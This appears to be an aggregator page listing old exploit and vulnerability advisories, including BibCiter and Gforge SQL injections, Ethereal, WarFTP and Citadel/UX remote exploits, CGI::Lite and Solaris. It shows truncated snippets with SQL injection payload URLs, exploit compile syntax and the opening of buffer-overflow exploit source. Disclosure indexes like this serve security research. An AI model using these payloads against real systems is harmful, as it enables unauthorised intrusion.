BibCiter 1.4 - Multiple SQL Injections

BibCiter 1.4 Multiple SQL Injection Vulnerability Author: nuclear site: http://bibciter.sourceforge.net/ vuln: http://localhost/path/projects.php?idp=-721 UNION SELECT @@version%23 http://localhost/path/contacts.php?idc=-1 UNION SELECT @@version%23 http://localhost/path/users.php?idu=-1 UNION...

BibCiter 1.4 Multiple SQL Injection Vulnerabilities

No description provided by source. BibCiter 1.4 Multiple SQL Injection Vulnerability Author: nuclear site: http://bibciter.sourceforge.net/ vuln: http://localhost/path/projects.php?idp=-721 UNION SELECT @@version%23 http://localhost/path/contacts.php?idc=-1 UNION SELECT @@version%23...

Gforge 4.6 rc1 - 'skill_edit' SQL Injection

Gforge = 4.6 rc1 skilledit SQL injection Vendor Notified: 2008-10-06 Impact: zomg! Note: should work regardless magicquotesgpc setting. Requires: Creating an account and be logged in Vulnerable function: handlemultiedit$skillids on /www/people/skillsutils.php...

Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability

No description provided by source. Gforge = 4.6 rc1 skilledit SQL injection Vendor Notified: 2008-10-06 Impact: zomg! Note: should work regardless magicquotesgpc setting. Requires: Creating an account and be logged in Vulnerable function: handlemultiedit$skillids on /www/people/skillsutils.php...

gforge46-sql.txt

Gforge = 4.6 rc1 skilledit SQL injection Vendor Notified: 2008-10-06 Impact: zomg! Note: should work regardless magicquotesgpc setting. Requires: Creating an account and be logged in Vulnerable function: handlemultiedit$skillids on /www/people/skillsutils.php...

Ethereal 10.x AFP Protocol Dissector Remote Format String Exploit

No description provided by source. / etherealv0.10.: AFP remote format string exploit. by: vade79/v9 [email protected] fakehalo/realhalo compile: gcc xethereal-afp-fmt.c -o xethereal-afp-fmt ethereal homepage/url: http://www.ethereal.com syntax: ./xethereal-afp-fmt -spSrPanc -h host vulnerable...

WarFTP 1.65 - 'USER' Remote Buffer Overflow

include include include define VULNSERVER "WAR-FTPD 1.65" define VULNCMD "\x55\x53\x45\x52\x20" define ZERO '\x00' define NOP '\x90' define VULNBUFF 485 define BUFFREAD 128 define PORT 21 define LENJMPESP 4 / WARFTP - VERSION 1.65 WarFTP Username Stack-Based Buffer-Overflow Vulnerability...

Citadel/UX Remote Buffer Overflow Exploit

Exploit for linux platform in category remote exploits ========================================= Citadel/UX Remote Buffer Overflow Exploit ========================================= / Citadel/UX remote exploit By nebunu: pppppppal at yahoo dot com home.ro lamerz erased my email protected address f...

Security bug in CGI::Lite::escape_dangerous_chars() function

SUBJECT Security bug in CGI::Lite::escapedangerouschars function, part of the CGI::Lite 2.0 package, and earlier revisions thereof. SUMMARY The CGI::Lite::escapedangerouschars function fails to escape the entire set of special characters that may have significance to the underlying shell command...

Solaris 7.0 - cancel Local Privilege Escalation

Solaris 7.0 - cancel Local Privilege Escalation / source: https://www.securityfocus.com/bid/293/info A buffer overrun condition was discovered in Solaris 2.6 X86 in /usr/bin/cancel. This buffer overflow is apparently present in the SPARC version as well although it is thought to be unexploitable...